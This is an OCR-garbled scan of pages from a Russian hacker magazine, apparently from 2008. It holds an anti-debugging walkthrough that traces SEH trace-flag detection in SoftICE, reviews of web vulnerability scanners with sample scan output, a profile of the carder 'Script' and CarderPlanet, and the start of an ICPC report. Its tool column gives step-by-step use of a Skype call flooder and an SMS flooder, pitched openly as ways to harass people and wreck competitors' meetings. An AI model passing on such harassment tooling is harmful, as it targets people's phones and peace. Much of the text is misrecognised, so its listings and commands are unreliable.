краху программы. В ОПуБЬ^ 2.00с указанная ошибка до сих пор не 
исправлена, что ужасно напрягает. 
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Описание новых ѴЕН-функций на МБРМ 



возвращаетуправление, а второй — считывает регистровый контекст, из- 
влекает оттуда содержимое флага трассировки и увеличиваетзначение 
ЕІР на два байта — длину инструкции то ѵ еах, [еах] , вызывавшей 
исключение. 

Для упрощения отладки из программы выкинули все лишнее (и старто- 
вый код в том числе), поэтому для ее сборки применяется специальный 
командный файл следующего содержания: 



Отладчикуспешно обнаружен 



ТР-5ЕН.ЬаІ — сборка программы без стартового кода 

СІ /Ох /с ТР-ЗЕН.с 

Ііпк ТР-8ЕН. оЪо /АЫСЫ:1б /БКІѴЕК /РІХЕБ /ЕЫТКУ : пегшпі 
/ЗІІВЗУЗТЕМгСОЫЗОЬЕ КЕКЫЕБ32.ЫВ Б5ЕК32.1іЪ 

Компилируем программу и загружаем ее в любой подходящий отладчик 
(например, БоШСЕ). Если загрузка обламывается (известный глюкБоШСЕ), 
раскомментируем строку с командой іпЪ ОЗЬ, пересоберем программу, 
напишем в ЗоШСЕ : « іЗііеге оп» и запустим все по новой. ЗоЙІСЕ послуш- 
но всплывает на строке тоѵ есх, Из: [0 ] , и мы со спокойной совестью 
начинаем трассировку. Доходим до команды тоѵ еах, [еах] и в следую- 
щий момент переносимся куда-то внутрь системы, а конкретнее — в начало 
фу н кци и ЫТИЬЬ . БЬЬ ! Кі С/5 егСа 1 ІЬа скБі зра ѣ сЪ. ег, адрес которой в 
моем случае равен 77Р91ВВ8Ь. 

Приехали! Дальше продолжатьтрассировку нетсмысла, нужен способ быст- 
ро найти адрес структурного обработчика. Например, можно посмотреть, 
что находится в памяти по указателю КУ?; [0000000 ОЬ] : 

Определение списка адресов БЕН-обработчиков 
путем просмотра 7з:0 

: скі ; <- отображать двойные слова 

:б бз:0 ; <- смотрим что находится в бз: [0000000 ОЪ.] 



Ага, мы видим, что в РЗ: [ООООООООЪ. ] содержится адрес 0012РРВ4Ь, 
переходя по которому мы обнаруживаем структуру РХСРРТІОЫ_ 
РРСІЗТРАТІОЫ: { 0012РРВС , 004 002АЗ} , где первое двойное слово 
— указатель на следующий ЗЕН-обработчик, а второе — указатель на 
сам обработчик: 

Дизассемблерный листинг первого 
5ЕН-обработчика в цепочке 

: и 4002АЗ 

001В: 004002АЗ 33 СО ХОК ЕАХ, ЕАХ 

001В: 004002А5 40 ШС ЕАХ 

001В: 004002А6 СЗ КЕТ 

Упс, первый БЕН-обработчик не содержит ничего интересного и просто 
возвращаетуправление следующему обработчику, поэтому, используя 
первое двойное слово структуры РХСРРТІ0Ы_КРСІЗТРАТІ0Ы, мы пере- 
ходим по адресу 12РРВСЪ и видим следующую запись — РХСРРТІОЫ_ 
РРСІЗТРАТІОЫ : (РРРРРРРРЬ, 0040028АЪ. і . В данном случае она 
расположена рядом с первой, однако так бывает далеко не везде и не 
всегда, но это и неважно. Главное, мы получили адрес очередного обра- 
ботчика — 0040028АІ1. 



0038:00000000 0012ЕРВ4 00130000 0012Б000 00000000 
:<3 зз:12ЕРВ4 ; смотрим структуру ЕХСЕРТІОЫ_ 



Дизассемблерный листинг второго 
5ЕН-обработчика в цепочке 

: и 40028А 



КЕСІЗТКАТІСЖ 
:б 33 : 012РРВ4 

0023 : 0012ЕЕВ4 0012ЕРВС 004002АЗ ЕЕЕЕРРЕР 0040028А 
0023 : 0012ЕЕС4 79458989 ГРРРЕРЕР 0012РА34 7РРБР000 



001В : 0040028А 
001В : 0040028Е 
001В: 00400295 
001В : 0040029В 



МОѴЕАХ, [Е5Р + ОС] 

АББ ВУТЕ РТК [ЕАХ + 000000В8] , 02 
ЕАХ, [ЕАХ + 000000С0] 

МОѴ [0040033С] , ЕАХ 
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|Генерация «левого» исключения из-за ошибки в отладочном «движке: 
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001 В: 004002 А 2 ВЕТ 



001 В : 004002 В 7 



ТЕЗТ АН, 01 



; ТЕ бит 



001 В: 004002 ВА 62 004002 С 8 



Ага, а воттут, кажется, содержится что-то интересное! Вернувшись 
к прототипу функции Ьапсііег, определяем, что по смещению ОСЬ 
относительно верхушки стека расположена структура Сопѣехі. Сле- 
довательно, в регистр ЕАХ грузится регистровый контекст. А дальше... 
какой-то из регистров увеличивается на два байта. Но как узнать, ка- 
кой? Нам поможет сопіехі беірег, с помощью которого мы узнаем, что 
это ЕІР. А вот по смещению СОЬ в регистровом контексте содержит- 
ся ЕЕІадз, сохраняемый в глобальной переменной 0040033СЬ, на 
которую при желании можно поставить аппаратную точку останова 
на чтение/запись, чтобы посмотреть, что с ней происходит в 
дальнейшем : 



Все ясно! Защита анализирует содержимое регистра флагов и, 
если бит трассировки взведен, заключает, что программа находит- 
ся под отладкой. Как это обломать? Возможные варианты: сбросить 
бит трассировки в обработчике исключений путем модификации 
ячейки [ЕЗР+ОС] ОСЬ в отладчике. Чтобы автоматизировать про- 
цесс, можно создать условную точку останова на функцию ЫТРЬЬ . 
РЬЬ ІКіѴзегЕхсерІіопРізраІсЬег ( РЕХСЕРТІОЫ_РЕСОРР 
рЕхсрѣРес , СОЫТЕХТ *рСопЪехі) , всегда сбрасывая ТР-бит 
по адресу рСопіехі ЕЕІадз, что позволит надежно скрыть 
отладчик от защиты. При этом перестанут работать самотрассирую- 



Чтение глобальной переменной, хранящей регистр флагов 

:Ьрш 40033 С Ш *7 
: х 

Вгеак бие До ВРМВ #0023 : 0040033 С Ш БВЗ (ЕТ= 1 . 48 
тіііівесопбз) 

МЗВ Ьа 8 ДВгапсЬЕготІр =00400288 
МЗВ ЬазЦВгапсЪ.ТоІр= 004002 А 7 



щие программы, отладчики прикладного уровня и еще много чего, 
поэтому ручная работа все же предпочтительнее автоматической. 
Второй вариант(совершенно неуниверсальный, но надежный) — изме- 
нить условный переход по адресу 004002ВАЬ на безусловный, чтобы он 
всегда рапортовал защите о сброшенном флаге трассировки. Естественно, 
это про катит только с данной программой — за отказ отуниверсальности 
приходится платить. 

Попытка применения ОІАуОЬд приводит к краху, поскольку он не вполне 
корректно обрабатывает исключения (как структурные, так и векторные). 
Подробности — в одноименной врезке. ПС 
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Программы для хакеров 



ПРОГРАММА: 8КѴРЕ РНОНЕ КІІ_І_ЕР: 
ОС: ѴІЫР0Ѵ8 2000/ХР 
АВТОР: ЕЮ АИР СРОМ 




Флудим через Бкуре 



На страницах журнала мы не разупоминали отакой 
забавной и полезной штуке, какфлуд мобильников. 
Представь себе, как можно досадить человеку, 
разорвав его телефон непрерывными звонка- 
ми/зплБ-сообщениями, а уж прото, как приятно 
сорвать деловую встречу конкурентов я вообще 
молчу. Одним словом, наиболее предприимчивые 
товарищи давно смекнули, в чем польза телефон- 
ного флуда. Поэтому перейдем от слов к делу и 
рассмотрим незаменимый инструмент — со фти ну 
Бкуре Рбопе Кіііег. Начнем по порядку: 

1. Сперва устанавливаем программу БКУРЕ. 

В комплекте с тулзой идет одна из последних 
версий. Впредь прогу можно скачивать на офи- 
циальном сайте: ѵѵѵѵѵѵ.вкѵре.сот/іпи/ги . 

2. После завершения установки Скайпа инста- 
лим флудер. Для этого заходим в папку зкуре- 
біоосіег и запускаем файл Беіир. 

3. Теперь запускаем ехе’шникБкуреРЬопеКіІІег, 
который находится в папке Бкуре-Лоосіег, и 
начинаем осваивать функции тулзы :). 

4. В поле«контакт» вбиваем номертелефона 
того, кого будем флудить. Причем, номер следует 
указывать в международном формате, например: 
+7хххххххххх (для России). Жмем на кнопку с 
надписью «Добавить». Номер попадает в окошко 
«список смертников». По всем номерам в этом 
окошке программа будетзвонить по очереди. 

5. Заходим в «Настройки» и регулируем функции: 

• «Разговор продолжать» — через указанное ко- 
личество секунд программа броситтрубку, когда 



ее возьмутстой стороны. Если «О сек» — бросает 
сразу. Советую оставить «О» по дефолту, чтобы не 
кушала много денег. 

• «Ожидание ответа» — сколько секунд будет идти 
дозвон, пока неснимуттрубку. По дефолту стоит «30», 
надо сказать, что это вполне приемлемый вариант :). 

6. Запускаем Зкуре, заинсталенный ранее, 
авторизуемся на своем аккаунте, пополняем 
баланс (не менее $1 ) и разрешаем софтине 
БкуреРЬопеКіІІег юзать Скайп самостоятельно. 
Теперьты можешь составить списокжертв 
и жать на «Старт» в приветливом окошке 
БкуреРбопеКіІІег'а. Кстати, баланс твой будет 
оставаться на прежнем уровне, ибо даже при 
дефолтовых настрой кахтулза бросаеттрубку при 
дозвоне. В общем, лучше флудера не найти :). 
Поблагодарим ребятсѴѴНВ за этотприватный 
релиз утилы, респект:). 

ПРОГРАММА: АСІІМЕТІХѴЕВѴШЧЕЕАВіиТѴ 
ЗСАММЕР 

ОС: ѴІИВОѴЗ 2000/ХР 
АВТОР: АСИМЕТІХ 




Один из лучших сканеров веб-уязвимостей 



Среди множества самых разнообразных скане- 
ров, появившихся в последнее время, порой не 
так-то просто найти подходящий. Посемухочу 
представитьтвоему вниманию один из постоянно 
обновляющихся сканеров веб-уязвимостей от 
компании Аси пебх — Асипеііх ѴѴеЬ ѴиІпегаЬіІіІу 
Бсаппег. Тулза предназначена для проверки на 
такие веб-уязвимости, какБцМщесбоп, хбб, рЬр- 
іпсіисіе, еіс. Она автоматически обнаруживает 
следующие баги: 



• Сгозз зібе зсгірбіпд — выполне- 
ние вредоносного сценария в браузере 
пользователя при обращении и в контек- 
сте безопасности доверенного сайта 

• ЗфЬ іг^есбіоп — выполнение ЗОЬ- за- 
просов из браузера для получения не- 
санкционированного доступа к данным 

• База данных ОНБВ (Соодіе каскіпд 
бабаЪазе) — перечень типовых запро- 
сов , используемых хакерами всего мира 
для получения несанкционированного 
доступа к меЪ- приложения и сайтам 

• Выполнение кода 

• Обход ограничений на доступ к ка- 
талогам 

• Вставка файлов (Рііе іпсіизіоп) 

• Раскрытие исходного текста сцена- 
рия (ака просмотр сорцов : ) 

• СКЬР іп^есбіоп 

• Сгозз Тгате зсгірбіпд 

• Общедоступные резервные копии 
файлов и папок (ака поиск бэкапов в 
веб- директориях ) 

• Файлы и папки, содержащие важную 
информацию 

• Файлы, которые могут содержать 
информацию, необходимую для прове- 
дения атак (системные логи, журналы 
трассировки приложений и т.д. ) 

• Файлы, содержащие листинг каталогов 

• Каталоги с низким уровнем защиты, 
позволяющие создавать, модифициро- 
вать или удалять файлы 



Крометого.сканерумеет идентифицировать задейст- 
вованные серверныетехнологии (ѴѴеШАѴ, РгопіРаде 
ит.д.) и разрешение на использование потенциально 
опасных бКр-методов (РІЯ, ТРАСЕ, 0Е1_ЕТЕ). 
Пожалуй, единственный минус — платность 
полнофункциональной версии. Хотя, за хороший 
софт не жалко заплатить, правда? 

ПРОГРАММА: ІЧІКТО 
ОС^ИІХ/ѴНЧ 

АВТОР: СІРТ.ІМС. 

Еще один знаменитый сканер уязвимостей, 
который не нуждается в дополнительном 
представлении — ІЧікІо. Софтина отличается 
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Популярный регі-сканер 



от аналогов, прежде всего, тем, что полно- 
стью реализована на Регі, благодаря чему 
одинаково приятно эксплуатируется как на 
*піх, так и на ѴѴіп- платформах. Сканер под- 
держивает 556-соединение, работу через 
прокси и много чего еще. В базе собрана 
информация о более чем 3000 опасных 
уязвимостей в СбІ-сценариях и ошибках 
НТТР-серверов (стандартные пароли, откры- 
тые для чтения файлы конфигурации и т.п.]. 

С помощью подключаемых модулей утила об- 
ретает высокую функциональность, поэтому 
не поленись посмотреть в папку /ріидіпз :). 
Для полноценной работы ІЧікІо необходимо 
установить свежую версию РегГа, модули 
ЫЕТ::55І_еау, біЬѴѴЫзкег, а также 0реп55б (в 
случае использования на ѴѴіп-платформах 
— модуль N еі; : : 55 Ь] . если требуется подде- 
ржка 556-соединений. 

Сканер хорош в тестировании удаленных 
хостов на наличие различных уязвимостей: 



• В базе программы имеется информация 
о более чем 3200 уязвимых веб-сцена- 
риях, а также 625 веб-демонов 

• Инфа об уязвимостях оформляется в 
виде специальных плагинов, что поз- 
воляет расширять базу без апдейта 
самого приложения 

• Ыікбо поддерживает автоматические 
обновления, поэтому за новыми пла- 
гинами не придется вручную вылезать 
в Сеть 

• Анти- ЮЗ методы - еще одна отличи- 
тельная черта Ыікбо. Опытные адми- 
нистраторы нередко устанавливают 
системы обнаружения вторжения и та- 
ким образом обламывают разного рода 
сканирования . В отличие от других 
сканеров, использующих Регі-библио- 
теку ЬіЬиЬізкег, Ыікбо не определя- 
ется ІБЗ-системой 

• В ядре программы заложены различ- 
ные збеаібіі-методы, позволяющие за- 
маскировать свою работу под обычные 
пользовательские запросы 

• Если возможно, Ыікбо самостоятель- 
но определит директорию с ССІ- скрип- 
тами и проверит ее на наличие бажных 
сценариев 

• Полноценная поддержка прокси (с 

возможностью авторизации) , а также 
ЗЗЬ-соединения при правильном подхо- 
де гарантируют твою безопасность 



• Если веб-сайт требует авторизацию, 
Ыікбо легко сможет пройти ее (естес- 
твенно, зная корректные имя пользо- 
вателя и пароль) 

• Если веб-демон не найден на стан- 
дартном 80 порту, Ыікбо попробует 
найти его на любом другом 

• Для увеличения скорости работы 
поддерживается интеграция с шпар ' ом 



ПРОГРАММА: ЗМ5 Н.0СЮЕК+ЗРАМЕК 
ОС: *ІЧІХ/ѴІИ 

АВТОР: ОХ 




Флудим мобильники 



Еслитулзудля флуда мобильников путем непрерыв- 
ныхзвонков мы уже рассмотрели, то теперь настало 
время смс-флуда. Хочу обратить твое внимание на 
софтинкуЗМЗйообег+зратег, написанную на РНР. 
Перед нами флудер-спамер 5М5, работающий 
через Маіі.ги. Он позволяет слать заданное число 
сообщений на определенный номер или по одному 
сообщению на номера из заданного списка. Для 
работы скрипта нужны: Ы-ное число аккаунтов таіі.ги 
и хосте поддержкой РНР и функций сокетов. Скрипт 
имеетудобный веб-интерфейс и представляет 
собой функциональную панельуправления флудом, 
реализованную с помощьютехнологии АІАХ. Объемы 
рассылок напрямую зависят от количества аккаунтов 
(которыеты можешь приобрести на большинстве 
хак-форумов по приемлемой цене). Скрипт позволяет 
указывать текстБтз-сообщения.формироватьлисты 
отп ра в ки , ра н до м из и ро вать м есса ги , еіе . Та кже ты 
м ожеш ь в руч ну ю указать и нте р вал ы ожи да н и я м ежду 
отправками, указав соответствующие значения перед 
запуском флудера. Одним словом, еслиты решил 
немного прорекламироватьсвойтовар или попортить 
кому-то жизнь — этатулза специально для тебя. 

ПРОГРАММА: РНР ЗЕСШІТѴ ЗСАЫІЧЕК 
ОС: *ГЧІХ/УІІЧ 

АВТОР: ^X 




Удобный скриптовый сканер 



Иногда случается так, что установить полноцен- 
ный сканер не представляется возможным по 
причине недостатка прав. В этой ситуации на 
помощь приходят различные скриптовые утилы, 
предназначенные для сканирования портов и 



взлом 



обнаружения различного рода уязвимостей. Из 
основных возможностей можно выделить: 



• Сканирование портов + выводит спи- 
сок возможных Троянов 

• Біг зсап 

• зиЬ бошаіп зсап 

• ССІ зсап (по словам автора, пока не 
доделан) 



В никсах и в Винде скрипт следует запускать из 
консоли: 



Ехашріе: рЪр зсап.ркр -Ь. апбісЪаб. 
ги -биіі 



Чтобы показать все наглядно, рассмотрим при- 
мер скана произвольного хоста: 



[-] Віаск Саб ѵ 1 . 1 (Ъебба) 

[+] Тагдеб ІР: 78.110.50.112 

[+] Тагдеб Нозбпаше : ********. ги 

[+] Тагдеб Рогб : 80 

[ + ] Тіте оиб : 0.5 

[+] Збагб Тіте: 01.06.59 

[ + ] РіпдТіте: 0.02 



Рогб Зсап 



21 ЕТР — Еііе Тгапзбег Ргобосоі 
[Сопбгоі] 

22 ЗЗН — ЗЗН (Зесиге Зкеіі) Кепюбе 
Ьодіп Ргобосоі 

25 ЗМТР — Зігпріе Маіі Тгапзбег 
Ргобосоі 

53 БОМАІЫ — Ботаіп Ыаше Зегѵег 
80 ШМ-НТТР - Могісі деібе МеЪ НТТР 
(Нурег Техб Тгапзбег Ргобосоі) 

110 РОРЗ — Розб Оббісе Ргобосоі 
— Ѵегзіоп 3 

119 КПМТР — Ыебѵюгк Ыеиз Тгапзбег 
Ргобосоі 



Зсап рогб : 59 
Ореп рогб : 52 
Ботеп Зсап 



******** сот 



Зсап сіотеп: 11 
Еіпсі сіотеп : 1 
Біг Зсап 



[*] Еоипсі: Ьозб . сот/асітіп/ II 200 [*] 
Еоипсі: бюзб . сот/асітіп/ | | 200 [*] 
Еоипсі: бюзб . сот/сабаіод/ I I 2 00 [*] 
Еоипсі: Ъозб . сот/біітз/ I I 200 [*] 
РоипсЗ: бюзб . сот/ітадез/ II 403 [ * ] 
Еоипсі: бюзб . сот/раззѵ?сі/ || 300 [ * ] 
Еоипсі: Ъозб . сот/регі/ | | 500 [*] 
Еоипсі: Ьозб . сот/ргосіисбз/ II 200 [*] 
Еоипсі: Ьозб . сот/зегѵег-збабиз/ | | 
200 [*] Еоипсі: Ьозб . сот/зегѵег-іпбо/ 
N 2 00 [*] Еоипсі: Ьозб . сот/ѵісіео/ I I 
200 ЦЦ 
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Профайл: Зсгірі: 



МАРИЯ «МІРИІІ-1-» НЕФЕДОВА 

/ МІРШШёЖЮОІСК.КІІ / 



Крестный 
отец кардинга 

Казалось бы, разве что-то может объединять два таких разных поня- 
тия - хакинг и политика? Оказывается, может. Только не «что-то», 
а «кто-то». В прошлом - легендарная личность компьютерного андегра- 
унда, известный на всю планету кардер Бсгірі. Ныне, по мнению сек- 
ретных служб - глава «Интернет партии Украины» Дмитрий Голубов. 



Н КОГДА ДЕРЕВЬЯ БЫЛИ БОЛЬШИМИ 

Одно старое утверждение гласит, что лучше всего о человеке говорят 
его поступки. Так что сейчас будет небольшой экскурс в прошлое. В ходе 
него я расскажу о некогда нашумевшем (и по сей день культовом) месте 

— сагбегрІапеЕ Правда, живо оно только в памяти тех, кто помнит. 

Наша история начинается в конце 90-х, когда рунет был молод, да и 
интернет, в целом, не достиг еще зрелого возраста. В то время умельцы 
со всего мира провернули не одну громкую околосетевую аферу. По сути, 
такие вещи, как кардинг, зародились именно тогда — в пору расцвета 
интернет-магазинов и оплаты кредитками онлайн. 

Явление русского кардинга тогда развивалось параллельно со всем 
остальным миром, не считая некоторых «но». Например, чувства меры 
у нашего брата хватает не всегда, так что из-за огромного числа слу- 
чаев мошенничества в какой-то момент зарубежные магазины просто 
перестали отправлять товары в наши края. В основном народ просто 
расплачивался чужими, а то и вовсе несуществующими карточками. 
Стоит заметить, что от крайне сомнительной репутации мы до сих пор 
избавились не до конца, и связываться с русскими на том же ЕВау часто 
боятся. Как показывает практика, правильно делают. 

А тогда, в конце 90-х, из общей массы кардеров выделился ряд людей, 
которые стали своего рода элитой — они занимались сетевым мошен- 
ничеством наиболее серьезно и, если можно так выразиться, профес- 
сионально. Эти «профи» и образовали костяк будущего сообщества на 
многие годы вперед. Позаимствовав терминологию у мафиозных кланов 
времен сухого закона, они стали называть себя «семьей». Бэкапы и 
архивы донесли их ники до наших дней. В «семью» входили: БсгірЕ 
Рубеп, Рап КоЬопез, Воа, ѴѵсЗ. Все они хорошо и достаточно давно 
знали друг друга, и между ними царило полное доверие. Стать ее чле- 
ном можно было, только работая с «семьей» в целом и со Скриптом в 
частности. Так русский сегмент «бизнеса» появился на свет, развился и 
практически состоялся, — даже образовалась некая элитарная прослой- 
ка. Но своего дома у наших кардеров по-прежнему не было. Исправить 
это упущение взялся БспрС создав первый русскоязычный сайт по теме 

— ѵѵѵѵѵѵ.сагбег.ги . Однако он хотел сделать не просто какой-то там сайт, 
для галочки, а по-настоящему хороший и удобный ресурс, где можно 
было бы делиться опытом, поискать совета, провернуть сделку, еіс. И у 



него получилось — настолько удачно, что сагсіег.ги не прожил и года; им 
сильно заинтересовались спецслужбы разных стран. От греха подальше 
сайт прикрыли, что лишний раз подтверждало: затея удалась. Затем 
было принято решение сагбег реанимировать. С этой целью был куплен 
легендарный домен — сагбегрІапеЕсот . он же сагбегрІапеЕсс . о кото- 
ром мало кто не слышал. 

Иерархия на сагбегріапеі продолжила традиции итальянской мафии. 
Даже звания пользователям здесь присваивались сообразно этой 
схеме. Так, члены со статусом Саро-бі-сарі (слегка перевранное Саро беі 
Сарі, «Босс всех боссов») отвечали за безопасность и помощь «семье». 
Саро были проверенными мемберами, Боп'ы членами «семьи» — и так 
далее. Несмотря на этот пафос, который со стороны может показать- 
ся забавной игрой, дела на «планете» делались большие и вопросы 
обсуждались серьезные. А еще, как ни странно, там практически не 
было ламеров и толп пятнадцатилетних новичков с дурными вопросами. 
Форумы сагбегріапеі: постепенно превратились в сердце и душу сайта. 
Они приютили не только кардеров, но и хакеров всех мастей, а также 
спамеров, людей, пишущих вредоносное ПО под заказ, и многих других. 
Большинство участников были настоящими мастерами своего незакон- 
ного дела. Основным языком ресурса был, конечно, русский, но имелся 
и специализированный раздел для англоязычных юзеров, который тоже 
пользовался популярностью. 

Множество уникальной и полезной информации плюс проверенные 
люди (кидал в пору расцвета сайта быстро вычисляли и присваивали 
им статус Ріррег) и спектр услуг на любой вкус стабильно приводили на 
сайт новую публику. Услуги, в самом деле, были разнообразны: начиная 
от продажи номеров краденных кредиток, РауРаІ и ЕЬау акков и закан- 
чивая подделкой документов и пластиковых карт и заказом спам-рас- 
сылок. «Планета» цвела и пахла, но такая бурная деятельность не могла 
не привлечь внимания правоохранительных органов. По «первости» на 
сайт засматривались большей частью западные спецслужбы (на рубеже 
XX и XXI века нашим и без кардеров было чем заняться). Но чем больше 
становились обороты «Планеты» и чем громче гремела ее слава, тем 
сильнее сайт мозолил глаза всем, кому только можно. 

Активные репрессии начались в 2004 году. Сначала на Кипре арестова- 
ли одного из членов «семьи» — Воа ака Романа Вега. Ему принадлежал 
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сетевой сервис Воа Гасіогу, специализировавшийся на продаже под- 
дельных документов практически любого образца, от дипломов до пас- 
портов. Работала «фабрика» Боа и с реальным пластиком для кардеров, 
продавая как готовые пустышки, так и соответствующее оборудование. В 
том же году ряд банков и платежных систем публично признали, что на 
территории Украины зафиксирован серьезный всплеск «компрометации 
информации о пластиковых картах». Говоря русским языком, налицо 
огромное количество случаев мошенничества с банковскими карточка- 
ми, будь то нелегальное снятие денег или же их подделка. Тогда же на 
форуме «Планеты» появляется топик с заявлением Скрипта об уходе. 
Причина была в том, что его личность стала слишком известна, а под 
сагбегріапеі начали копать сразу с многих сторон. После ухода двух 
отцов-основателей сайт начал стремительно деградировать — массовое 
пришествие кидал, а также волны нубов подкосили его окончательно. 
Очень «некстати» от спячки очнулись украинские и российские кибер- 
полицейские, присоединившись к коллегам из ФБР и Скотланд-Ярда, 
которым «Планета» не нравилась давно и плотно. 

Дожидаться массовых облав, арестов и закрытия сайта «сверху» новая 
администрация не стала. 28 июля 2004 года на форуме появилась тема, в 
которой ясно говорилось, что так более продолжаться не может, работать 
становится слишком опасно и сайт будет закрыт. На прощание, обмен 
контактами и тому подобные вещи отвели пару недель. 

В 5СКІРТ 

Само собой, закрытие ресурса уже не могло остановить начавшие- 
ся расследования, и уход «Планеты» на покой не помешал властям 
произвести два очередных ареста. В ходе совместной операции ФБР, 
американской почтовой службы, полиции Великобритании и секретной 
службы министерства финансов США в середине 2005 были пойманы 
два кардера — Дуглас Хавард и Ли Эдвуд. На сагбегріапеі: Хавард носил 
статус Саро сіі Сарі. Недостатка улик не наблюдалось, и причастность к 
«семье» доказали быстро. Вскоре после задержания оба признали свою 
вину, и созналась в том, что отмывали деньги, обналичивая их через 
банкоматы и используя при этом ворованные номера кредиток, полу- 
ченные от сообщников на «Планете». Так как западная система право- 
судия, в общем-то, не чета нашей, осудили и посадили обоих — одного 
на четыре года, а другого на шесть лет. Тут можно только посочувство- 
вать, но замечу, что речь шла о кражах шести- и семизначных сумм 



— ребятам приписывали порядка двенадцати миллионов долларов. 
Эдвуд и Хавард не только сели сами, но и дали показания против других 
членов сагбегрІапеГ Судя по всему, им было, что рассказать органам, 
потому что на Дмитрия Голубова вышли во многом благодаря именно 
их информации. Полицейские разных стран продолжали рыть копытами 
землю. Их задержанные были не более чем исполнителями и мелкой 
сошкой, а вот Зсгірі: «весил» гораздо больше. 

Дмитрия арестовали в июле 2005, в родной Одессе на улице Довженко, в 
квартире у бабушки. К этому моменту Голубов уже почти год находился в 
международном розыске. Вся операция проводилась под покровом стро- 
жайшей секретности. О планирующемся аресте знали лишь несколько 
человек, так как в милиции опасались, что особенно охочие до денег 
сотрудники, прознав о грядущей операции, не удержатся от соблазна и 
обо всем расскажут подозреваемому. Но информация осталась в сохран- 
ности, и он загремел на скамью подсудимых. 

Как итог, в 2005 году на Украине слушалось первое дело о кибер-пре- 
ступнике за всю ее историю. Притом, с места в карьер — очень крупное, 
поймали настоящего босса виртуального синдиката! Даже американцы 
назвали этот арест «самым громким в Восточной Европе». Более двад- 
цати томов следственных материалов (прорва информации)... — всего в 
делах «Планеты», по подсчетам органов, было задействовано около 7000 
скаммеров со всего мира, и спецслужбы расстарались, стремясь при- 
жать главаря по полной. На какое-то время могло показаться, что им это 
удалось... Но потом все пошло совсем не как было запланировано. 

Для начала, адвокатом Дмитрия выступил Петр Бойко — вице-президент 
Союза адвокатов Украины, попросту говоря — один из лучших адвокатов 
в стране. По словам Петра, об этом деле ему рассказали знакомые и 
попросили вступиться за хорошего парня. Правда, сам «виновник тор- 
жества» утверждает, что к Петру слезно обратились его родители, и тот 
взялся за дело из профессионального интереса (прецедент действитель- 
но интересный) и, что характерно, — совершенно бесплатно. Но если бы 
головной болью обвинения стал только адвокат... На предварительном 
слушании, в декабре 2005, всплыли гораздо более любопытные вещи. 
Например, представителям компаний Ѵіва и МазІегСагсІ запретили высту- 
пить в суде из-за того, что они якобы причастны к следственным мероп- 
риятиям (документов, подтверждающих это, так и не нашлось). Защита 
Голубова заявила, что Дмитрий вообще никогда не думал скрываться от 
следствия — и знать не знает ни о каком кардинге и миллионах долла- 
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Сайт«Интернет партии Украины» 



ров. Судье, в свою очередь, отчего-то стало «некогда» перечитывать все 
двадцать увесистых томов дела. Под занавес оказалось, что Голубова 
и вовсе выпускают на свободу, на поруки двух народных депутатов — 
Владимира Демехина и Владимира Макеенко. Получилось, что Голубов 
пробыл под стражей всего полгода, после чего был благополучно отпу- 
щен на все четыре стороны под подписку о невыезде. 

Разумеется, СМИ всего мира тут же горестно взвыли на разные лады. 
Зарубежные, в основном, качали головой и вздыхали о коррупции, а 
наши выражали удивление разной степени тяжести и саркастичности. 
Особенно журналистам пришелся по душе «пассаж» одного из народных 
избранников, поручившихся за Голубова. В интервью «Коммерсанту» 
Владимир Демехин заявил, что: «Парня просто угробят. А ведь он моло- 
дой талантливый человек. Такие ребята — это сливки нашей молодежи». 
Второй поручитель — Макеенко — напротив, признался, что о Голубове 
ничего толком не знал и не знает, его просто попросил помочь все тот же 
Демехин. Мол, депутатская взаимовыручка, мы часто так делаем, а тут 
поручителей нужно было двое, формальности... 

И хотя дело Голубова не закрыто до сих пор, это тоже скорее формаль- 
ность, потому что с того самого декабря было ясно, чем все закончится. 
Зато вряд ли тогда кто-то мог подумать, что он, вместо того чтобы залечь 
на дно и подождать спада шумихи, решит ею воспользоваться. 

Решив обратить черный РР в свою пользу, в нынешнем 2008 году 
24-летний Голубов основал Интернет партию Украины ( ЬіІр://іри.сот. 
иа). По его словам, «плохая реклама — тоже реклама» и, если бла- 
годаря ней у партии появятся новые члены, она свое дело сделала. 
Программа партии стоит того, чтобы с ней ознакомиться. Бывший, по 
мнению иностранных спецслужб, кардер предлагает народу и лега- 
лизацию проституции, и тотальную компьютеризацию всей страны 
— вплоть до создания электронного правительства, а также призывает 
разорвать договор о нераспространении ядерного оружия и вплотную 
заняться его производством и улучшением. Более подробно ознако- 
миться с этими идеями можно на сайте партии — очень увлекательное 
чтиво, меня всю дорогу не покидало чувство, что это какой-то масш- 
табный розыгрыш. 




Скрипт продает дампы в форуме «Планеты» 



Более того, сегодня Голубов отрицает всякую свою причастность не 
то, что к «Планете», он вообще уверяет, что с компьютерами на «Вы» 
и хакер из него решительно никакой. Всю историю с судебным про- 
цессом Дмитрий и его адвокат называют фальсификацией и ошибкой. 
Дело, мол, было сфабриковано по заказу различных платежных систем 
и органы просто нашли козла отпущения. Где здесь кончается правда и 
начинается политика, догадаться несложно. 

Как бы то ни было, история «крестного отца» нашего компьютерного 
андеграунда пока далека от завершения. Скорее, она только начи- 
нается. Вероятность того, что о Голубове мы еще услышим, весьма 
высока. Как говорится, зіау ІипесІ, а мы обещаем держать руку на 
пульсе. СНІ 
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СМ ІСРС — ЧЕМПИОНАТ МИРА ПО СПОРТИВНОМУ ПРОГРАММИРОВАНИЮ! 






Этой весной, с б по 10 апреля, в маленьком горном городке Банф 
на западе Канады три сотни лучших молодых математиков и програм- 
мистов собрались для участия в чемпионате мира по спортивному 
программированию АСМ ІСРС, главным спонсором которого выступа- 
ет корпорация ІВМ. По приглашению этой замечательной компании я 
и отправился в Канаду, чтобы своими глазами увидеть битву лучших 
молодых умов планеты. 



Н СПОРТИВНОЕ ПРОГРАММИРОВАНИЕ 

Спортивное программирование — вещь очень специфичная, стоящая 
особняком оттого, что ты вообще привык понимать под программиро- 
ванием. Задачи, которые ставятся на соревнованиях по спортивному 
программированию любого уровня, несут в себе, главным образом, 
математические и алгоритмические вопросы. Любая проблема здесь, 
как бы она ни была подана, всегда упирается в составление математи- 
ческих моделей и решение математических задач. 

Решений «на пальцах» тут не бывает: даже если задачку и можно 
решить тупым перебором, такое решение не пройдет по ограничениям 
на ресурсы — для каждого задания существуют пороговые значения по 
используемой памяти и времени выполнения. 

Таким образом, для успешного участия в подобных соревнованиях 
участникам требуется сильная и фундаментальная подготовка в области 
математики, причем на серьезном уровне. 

Другой важный аспект — это коллективная работа в командных сорев- 
нованиях. Ведь при решении задач в соревновательном режиме нужно 
оптимально распределить работу внутри коллектива, чтобы не мешать 
друг другу и вместе добиваться результата. 



□ УЧАСТНИКИ 

В финале АСМ ІСРС 2008участвовало 100 команд со всего мира, причем от 
